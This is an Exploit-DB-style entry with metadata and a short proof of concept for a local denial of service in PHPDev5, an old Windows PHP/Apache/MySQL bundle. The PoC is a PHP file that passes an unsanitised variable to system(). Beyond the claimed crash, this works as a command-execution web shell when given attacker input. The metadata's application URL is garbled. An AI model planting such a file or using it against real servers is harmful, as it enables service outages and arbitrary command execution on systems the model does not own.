phpDEV5 - System-Call Local Denial of Service
Author: Ali7
type: dos
platform: windows
port:
date_added: 2005-03-16
date_updated: 2016-05-06
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comphpdev423_mod_perl.exe
------------------------------------------------------------------------
# PHPDev5 <== Apache Server Local Denial-of-Service PoC
# By : Ali7
# e-mail : ali7@hotmail.co.uk
# date : 16-03-2k5
# greetz : our group :P
>Target : PHPDev 5
>URL : www.firepages.com.au - http://sourceforge.net/projects/phpdev5/
>Type : PHP/Apache/MySQL Server..
..
>>PoC Sample :
Save this code as .php or .php3 file..
//start
<?
system($Ali7);
?>
//end
# milw0rm.com [2005-03-17]